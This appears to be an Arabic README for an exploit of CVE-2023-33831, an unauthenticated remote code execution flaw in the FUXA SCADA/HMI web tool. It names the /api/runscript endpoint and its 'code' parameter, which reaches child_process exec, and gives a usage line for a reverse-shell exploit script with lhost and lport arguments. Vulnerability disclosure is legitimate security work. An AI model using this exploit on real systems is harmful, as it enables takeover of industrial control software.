
وصف واستغلال لثغرة CVE-2023-33831 التي تؤثر على برنامج FUXA لتصور العمليات المستند إلى الويب (SCADA/HMI/Dashboard).
تؤثر الثغرة على مكوّن البرمجة النصية في FUXA، بسبب عدم وجود تحكم أو تعقيم على المدخلات التي يمكن للمستخدمين التحكم بها، مما يسمح باستخدام طرق خطيرة يمكن استغلالها لتنفيذ التعليمات البرمجية عن بُعد. المسار المتأثر هو /api/runscript، حيث يمكن تنفيذ الأوامر دون الحاجة إلى المصادقة عبر معامل code باستخدام طريقة POST، وذلك باستخدام وحدة child_process عبر دالة exec.
python CVE-2023-33831.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>